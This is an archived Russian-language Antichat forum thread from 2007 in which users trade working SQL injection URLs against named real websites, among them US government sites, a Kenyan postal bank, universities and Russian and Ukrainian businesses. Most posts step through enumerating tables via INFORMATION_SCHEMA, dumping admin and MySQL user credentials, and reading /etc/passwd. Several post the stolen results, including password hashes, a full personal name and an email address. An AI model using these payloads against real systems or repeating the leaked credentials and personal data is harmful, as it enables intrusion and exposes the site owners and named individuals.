ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.09.2007, 22:54
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
root:*2EFC34FE6B4EFAE9BA1829EE7E8E300FB346E61C
http://www.nea.gov/honors/heritage/fellows/fellow.php?id=1983_0'+union+select+1,AES_DECRYPT(A ES_ENCRYPT(user(),0x17),0x17),3,4,5,6,7,8,9,10,11, 12,13,14,15+from+mysql.user/*
http://www.lanl.gov/opportunities/techtransfer/dsp_technology.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
|
|
|
28.09.2007, 01:21
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2,3,4,5,6/*
1)находим табличку:
Код:
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+table_name,2,3,4,5,6+from+INFORMATION_SCHEMA.TABLES+limit+17,1/*
2)сделаем через жопу, т.к. вначале ошиблись)
Код:
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+COLUMN_NAME,Table_name,3,4,5,6+from+INFORMATION_SCHEMA.COLUMNS+limit+179,1
Код:
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+COLUMN_NAME,Table_name,3,4,5,6+from+INFORMATION_SCHEMA.COLUMNS+limit+178,1
3)выводим.
логин:
Код:
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+alias,2,3,4,5,6+from+administrators/*
пасс:
Код:
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+password,2,3,4,5,6+from+administrators/*
Последний раз редактировалось BlackCats; 28.09.2007 в 01:57..
|
|
|
|
28.09.2007, 01:28
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
находим колонки.where запрещено, поэтому так:
В 5 ветке подзапросы запрещены?.. Это к разговору о знаниях. Спокойно выборку по ключевым колонкам можно сделать
Код:
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+table_name,2,3,4,5,6+from+INFORMATION_SCHEMA.columns++where+column_name=0x70617373776F7264/*
и вот она твоя administrators...
Код:
http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+column_name,2,3,4,5,6+from+INFORMATION_SCHEMA.columns++where+table_name=0x61646D696E6973747261746F7273/*
и таблы в ней
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 28.09.2007 в 01:32..
|
|
|
|
28.09.2007, 15:35
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
Код:
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database() ),5,6/*
нашли табличку: inside_users
Код:
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,table_name,5,6+from+INFORMATION_SCHEMA.TABLES+limit+42,1/*
колумны:
login
Код:
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x696e736964655f7573657273+limit+4,1/*
pwd
Код:
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x696e736964655f7573657273+limit+5,1/*
fio
Код:
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x696e736964655f7573657273+limit+6,1/*
email
Код:
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x696e736964655f7573657273+limit+7,1/*
icq
Код:
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x696e736964655f7573657273+limit+8,1/*
pwd_recover
Код:
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x696e736964655f7573657273+limit+10,1/*
вывод:
vk:03f2816875e3a59a:Хворостов Владимир Александрович:vladimir@khvorostov.ru: :
Код:
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,concat(login,0x3a,pwd,0x3a,fio,0x3a,email,0x3a,icq,0x3a,pwd_recover),5,6+from+inside_users+limit+0,1/*
Последний раз редактировалось BlackCats; 28.09.2007 в 15:38..
|
|
|
|
28.09.2007, 16:17
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.postbank.co.ke/index.php?do=payment&op=morepayments&id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,databas e()),4,5,6,7,8,9,10/*
eriko@localhost.localdomain:4.0.20-log:postbank_skies
Код:
http://www.postbank.co.ke/index.php?do=payment&op=morepayments&id=-1+union+select+1,2,concat(user,0x3a,pass word) ,4,5,6,7,8,9,10+from+mysql.user/*
root:4c03944b42669d53
Код:
http://www.postbank.co.ke/index.php?do=payment&op=morepayments&id=-1+union+select+1,2,LOAD_FILE(char(47,101,116,99,47,112,97,115,115, 119,100)),4,5,6,7,8,9,10/*
Код:
http://galileo.co.ke/pages.php?p=32&ID=-1+union+select+1,concat(u ser(),0x3a,version(),0x3a,database()),3/*
admin@localhost:5.0.26-standard:galileo
Код:
http://galileo.co.ke/pages.php?p=32&ID=-1+union+select+1,LOAD_FILE(char(47,101,116,99,4 7,112,97,115,115,119,100)),3/*
Код:
http://galileo.co.ke/pages.php?p=32&ID=-1+union+select+u ser,2,password+from+mysql.user/*
faida 760b91c75fd34769
Код:
http://www.landscrona.ru/articles/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a,database()),10,11,12,13,14,15,16/*
ultrspru_data@localhost:4.1.22-lk-log:ultrspru_data
Код:
http://www.d-kaz.com/reviews/review.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,databa se()),4,5,6,7,8,9 ,10,11,12,13,14,15/*
вывод в исходнике dkasman@localhost:4.0.27-log:dkasman
Код:
http://azinba.com/companies.php?letter=d&id=9999+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database( )),5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21/*
azinba@localhost:5.0.41-log:azinba_main |
|
|
|
28.09.2007, 18:05
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
Код:
http://www.poly.edu/news/fullNews.php?id=9999+union+select+1,2,3,4,5,6,7/*
Код:
http://www.biodiversityscotland.gov.uk/pageType2.php?id=-1/**/union/**/select/**/1,version(),3,4,5,6/*&type=2&navID=92
Код:
http://www.buywithconfidence.gov.uk/tradeCategory.php?id=-1+union+select+1,2,3,4,5/*
Последний раз редактировалось Termin@L; 28.09.2007 в 18:52..
|
|
|
|
28.09.2007, 18:12
|
|
Новичок
Регистрация: 26.09.2007
Сообщений: 14
Провел на форуме:
124489
Репутация:
-38
|
|
Код HTML:
http://meteoprog.ua/table.php?cityid=-1+union+select+null/*
Код HTML:
http://meteoprog.ua/table.php?cityid=-1+union+select+name+from+admin/*
Последний раз редактировалось Don Carlione; 28.09.2007 в 18:17..
|
|
|
|
28.09.2007, 20:43
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://smart.am/eng/view.php?name=servicessystem&id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(version(), 0x 71),0x71),5,6,7/*
Код:
http://www.cpttm.org.mo/news_e.php?id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(ve rsion(),0 x71),0x71),6,7,8,9,10,11,12,13,14,15/*
Код:
http://www.panmacjc.org.mo/showTopic.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6/*
panmacjc_123456@localhost:5.0.19-standard:panmacjc_panmacjc
Давно нашел инъекцию на официальном сайте МакSим,
Код:
http://www.maxi-m.ru/news/?id=9999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7/*&c=html
maxi@localhost:4.1.22:maxi_sql
Код:
http://www.maxi-m.ru/news/?id=9999+union+select+1,2,3,4,(username,0x3a,user_password,0x3a,user_email,0x3a,use r_icq),6,7+from+ php bb_users+limit+1,1 /*&c=html
на данный момент форум не работает =\\ |
|
|
|
28.09.2007, 21:10
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
Код:
http://www.razom.lviv.ua/index.php?cont=docs&did=-1+union+select+null,concat_ws(char(58),user,pass,name),null+from+users/*
yura:e1f6e27996ac4b5fde1dc6a836e21275:Юрій Васильович
......... |
|
|
|
28.09.2007, 22:21
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
код:
http://www.combined.biz/portfolio_details.php?id=-195+union+select+1,2,concat_ws(0x3a,password,email _addr,user_name,password_hash,last_name,first_name ),4,5,6+from+user+limit+1,1/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
